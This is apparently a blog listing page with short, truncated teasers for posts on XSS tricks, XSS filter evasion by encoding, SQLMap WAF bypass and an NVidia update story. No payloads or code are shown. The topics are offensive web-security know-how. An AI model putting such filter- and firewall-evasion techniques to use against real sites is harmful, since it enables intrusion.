Introduction I was busy playing my favorite game when a notification update from NVidia pops up. But before I get to update the software, it…
XSS Trick: Semi-colon and Forward slash not allowed?
On the screenshot below, you can see that we can fully inject our payload without breaking a sweat. But you may notice that our // isn’t reflected…
XSS Filter Evasion: Encoding to the rescue!
WHAT IS ENCODING? It is the process of converting data from one form to another form using a scheme that is publicly available so that it can easily be…
SQLMap: SQLinjection WAF Bypass
What is a WAF? Web Application Firewall a.k.a WAF, acts as a “security guard” which takes care of what’s going in and out of a…